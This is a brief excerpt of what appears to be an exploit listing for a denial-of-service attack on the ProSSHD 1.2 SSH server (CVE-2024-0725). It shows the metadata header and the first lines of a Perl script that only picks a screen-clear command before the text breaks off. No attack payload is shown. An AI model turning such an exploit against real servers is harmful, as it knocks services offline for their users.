
ProSSHD 1.2 20090726 – Denial of Service (DoS)
# Exploit Title: ProSSHD 1.2 20090726 – Denial of Service (DoS) # Google Dork: N/A # Date: 13 january 2024 # Exploit Author: Fernando Mengali # Vendor Homepage: https://prosshd.com/ # Software Link: N/A # Version: 1.2 20090726 # Tested on: Windows XP # CVE: CVE-2024-0725 $sis=”$^O”; if ($sis eq “windows”){ $cmd=”cls”; } else…